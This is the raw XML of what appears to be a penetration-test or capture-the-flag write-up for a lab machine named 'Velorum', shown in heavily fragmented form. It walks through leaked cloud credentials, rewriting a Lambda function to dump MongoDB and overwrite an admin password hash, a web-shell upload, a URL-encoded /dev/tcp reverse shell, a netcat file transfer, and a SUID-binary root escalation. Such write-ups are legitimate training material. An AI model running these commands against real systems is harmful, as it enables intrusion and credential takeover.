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bh5m1x3iafo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cpiaaynxq0gy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Velorum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xnabgllw7hgx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started port enumeration on the target machine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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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were redirected to the virtual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added to the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to allow local DNS resolution.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24100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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possible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access the web application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14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on, it was possible to perform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fuzzing/brute-force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of application subdomains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order to identify new exposed endpoints and services.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FUZZ.velorum.hc'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n0kovo_subdomains.txt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22600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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subdomains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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">p://vault.velorum.hc/login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page of the application was identified.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8613"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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http://git.velorum.hc/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identified as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instance.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41913"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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subdomain, it was possible to view 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epositories/directories without authentication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15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15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file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credentials.json,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exposed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credentials were obtained from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repository.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1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1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file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route.js,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the application used a custom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cloud.velorum.hc,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integrated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functions, and that the application acted as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password vault.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1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same file, starting at line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observed that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specific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route performs a call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VaultFunction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returns the rendered data via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indicating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has direct access to the vault’s confidential data.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21000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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access this data, it was necessary to configure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credentials found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credentials.json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using the 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AWS CLI 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15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configuring the credentials, we tested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connectivity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custom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endpoint, confirming communication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cloud.velorum.hc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connection was successful, validating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environment.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get-caller-identity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6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evaluated the existence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VaultFunction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and were able to retrieve its information from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environment.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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information, it was possible to identify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Node.js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runtime, as well as the existence of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other ZIP files stored in the S3 directory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URL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stored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presigned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temporary access to the file.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"Configuration":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"FunctionName":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"VaultFunction",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"FunctionArn":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"arn:aws:lambda:us-east-1:000000000000:function:VaultFunction",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"nodejs18.x",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"arn:aws:iam::000000000000:role/lambda-execute-role",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"Handler":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"handler.handler",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1855002,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"MemorySize":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"LastModified":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"2026-01-07T13:42:21.794766+0000",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"CodeSha256":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"FTugeXGPfBKHh0l+gj6VwEgeIRrP07VSUOhJvqzPUjw=",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"$LATEST",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"TracingConfig":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"PassThrough"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"RevisionId":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"fd3ed6d6-98c2-4af6-a22d-93ccdec305c5",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"LastUpdateStatus":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"Successful",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"PackageType":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"Zip",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"Architectures":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"x86_64"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"EphemeralStorage":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"SnapStart":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"ApplyOn":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"OptimizationStatus":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"RuntimeVersionConfig":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"RuntimeVersionArn":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"arn:aws:lambda:us-east-1::runtime:8eeff65f6809a3ce81507fe733fe09b835899b99481ba22fd75b5a7338290ec1"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"LoggingConfig":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"LogFormat":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"LogGroup":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"/aws/lambda/VaultFunction"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"RepositoryType":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"http://s3.localhost.localstack.cloud:4566/awslambda-us-east-1-tasks/snapshots/000000000000/VaultFunction-7b535a4b-feb3-432f-9db1-79309acc012c?AWSAccessKeyId=949334387222&amp;Signature=NLTJ3j6BM%2B0ss%2FZl7aMRoHhES0A%3D&amp;Expires=1767796969"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downloaded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our local machine.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"http://cloud.velorum.hc/awslambda-us-east-1-tasks/snapshots/000000000000/VaultFunction-7b535a4b-feb3-432f-9db1-79309acc012c?AWSAccessKeyId=949334387222&amp;Signature=NLTJ3j6BM%2B0ss%2FZl7aMRoHhES0A%3D&amp;Expires=1767796969"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VaultFunction.zip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16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we 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xtracted the archive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analyze its contents.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VaultFunction.zip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13313"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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extracted directory, the files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package-lock.json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node_modules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were found.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Analyzing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it was identified as a serverless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(AWS Lambda)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responsible for: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Connecting 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database at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internal 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Retrieving all documents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collection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velorum_vault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Returning the data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format (status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or an error (status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'velorum_vault';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client.db(dbName);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db.collection('vault');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collection.find({}).toArray();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JSON.stringify(docs),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console.error("Error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MongoClient:",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possible to modify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to interact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gain access to the databases.</w:t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'velorum_vault';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client.db(dbName);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db.collection('vault');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collection.find({}).toArray();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JSON.stringify(docs),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console.error("Error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MongoClient:",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the modifications, the files were repackaged into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for reuse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environment.</w:t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mongo-full-enum.zip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16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MongoFullEnum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created, configured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Node.js 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using ZIP-based code, with a timeout of 15 seconds and 256 MB of memory, running in a local/simulated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environment.</w:t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create-function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MongoFullEnum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nodejs18.x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arn:aws:iam::000000000000:role/lambda-execute-role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--zip-file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fileb://mongo-full-enum.zip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--memory-size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78300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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MongoFullEnum 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was executed and the output was saved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output.json.</w:t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MongoFullEnum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1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Finally,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the data extracted from MongoDB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analyzed.</w:t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'.body'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'|keys'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1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velorum_app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database was identified, containing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stored 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credentials.</w:t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'.body'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1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result, the usero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admin@velorum.hc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the associated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 hash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were obtained:</w:t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$2y$12$utfeLO161spkah9qFcGqvuGOfqZRJ6J5SmDpdVJrE6a2bE73JCbbS.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it was not possible to crack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existing hash could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 cracked, a new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bcrypt hash was generated for a known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Instead of cracking the original hash,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the database record was modified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replace the password with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controlled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authentication with a known credential.</w:t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bcrypt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generated for a known password.</w:t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b'P@$$word123!'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bcrypt.hashpw(pw,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bcrypt.gensalt(12))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print(h.decode())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1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modified again so the function would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update the administrator password hash.</w:t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updatePassword.js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velorum_app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velorum_app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client.db('velorum_app');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db.collection('users');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usersCollection.updateOne(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'admin@velorum.hc'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'$2b$12$sXRGnxCaTQ.jMMhqSPT9tuAXrY5dySCeZCHQdMvRxeiFmga9vwpPa'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(result.matchedCount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admin@velorum.hc'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(result.modifiedCount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result.matchedCount,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result.modifiedCount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result.matchedCount,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result.modifiedCount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client.close().catch(()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files were repackaged again into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archive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000161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mongo-change-admin-pass.zip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1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 Lambda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named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ChangePass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 to update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administrator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password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MongoDB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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create-function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nodejs18.x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arn:aws:iam::000000000000:role/lambda-execute-role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--zip-file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fileb://mongo-change-admin-pass.zip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--memory-size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1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function was then invoked to proceed with exploitation.</w:t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0763"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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successfully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changed the administrator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username and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authenticate to the main web application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admin:P@$$word123!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75313"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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1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analyzing the application,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file upload functionality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allowing files to be uploaded to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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0"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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intercepting this endpoint with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observed that the endpoint accepts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uploads. This allowed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uploading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enabling command execution on the server through the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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1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The uploaded file was then accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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03700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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forward, it was possible to execute system commands through parameter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of the uploaded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h7w5e15p1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h7h2f84ly3eo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already available,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initiated, obtaining interactive remote access to the machine.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url-encode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=%2Fbin%2Fbash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F%3Cmachine-ip%3E%2F443%200%3E%261%27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76400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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connection was received successfully, confirming control of the application.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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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the reverse shell, the session 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upgraded to a TTY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full terminal interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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1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 root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1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996wt6a9nmyh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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34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B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command, all binaries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bit set were listed, identifying potential privilege escalation vectors.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-4000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085000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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76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/usr/bin/vaultauth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bit set, indicating it executes with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 regardless of the executing user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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f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local analysis, the binary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/usr/bin/vaultauth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transferred with the aim of evaluating its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identifying potential exploitable flaws.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binary was transferred locally for analysis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netcat (nc)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send the file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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/usr/bin/vaultauth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47700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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receive the file: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-lvnp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binary was analyzed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understand its internal logic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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1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analysis 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Ghidra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FUN_00101289,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responsible for performing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operation (used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encrypt/decrypt data),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identified.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code analysis, it was possible to extract the key used, identified as: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2233445566778899aabb.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1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1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Further analysis identified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FUN_0010130c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which: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Prompts the user for a token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Applies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operation using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hardcoded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key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Compares the result with an expected value stored in memory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validation succeeds, executes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grep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root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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46638"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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42063"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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binary validated the input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strcmp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comparing the value provided by the user with the content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DAT_00104020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value was XOR obfuscated and decoded at runtime.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token used in the verification corresponded to the XOR value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6f587c040e00b1f09bee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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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encryption key had already been identified, it was only necessary to decrypt the user's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retrieve the expected value.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script was used below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decrypt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data by applying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previously found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bytes.fromhex("2233445566778899aabb")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cifrado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bytes.fromhex("6f587c040e00b1f09bee")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bytes([cifrado[i]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^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chave[i]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range(10)])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print(token.decode())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1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token obtained,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binary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executed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privileges. Since it executed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grep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without sanitizing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input, it was possible to exploit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execute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commands with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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48325" cy="2181225"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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812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this, we executed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exploiting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calling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bash,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allowed us to obtain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privileged shell as root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/usr/bin/vaultauth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Mk8Qhw9i1U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20800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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 located in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2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15025" cy="1123950"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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1239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0" w:type="default"/>
      <w:headerReference r:id="rId61" w:type="first"/>
      <w:headerReference r:id="rId62" w:type="even"/>
      <w:footerReference r:id="rId63" w:type="default"/>
      <w:footerReference r:id="rId64" w:type="first"/>
      <w:footerReference r:id="rId6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BM Plex Sans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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ngz9ss5weo0m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39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09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3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Velorum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1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11.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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13.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28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9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42.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/pt/cli/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId1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italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexMono-bold.ttf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexMono-boldItalic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IBMPlexMono-regular.ttf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans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Relationship Id="rId2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8zCQ3wwklwPJq9SWzIoaLTO5w==">CgMxLjAyDmguYmg1bTF4M2lhZm9lMg5oLmNwaWFheW54cTBneTIOaC54bmFiZ2xsdzdoZ3gyDmguOWg3dzVlMTVwMWozMg5oLmg3aDJmODRseTNlbzIOaC45OTZ3dDZhOW5teWgyDmgubmd6OXNzNXdlbzBtOAByITFzNVgyMzdrUmh2TUNTTW5DZVQ0cVZNV1RyVllCQlZCeA==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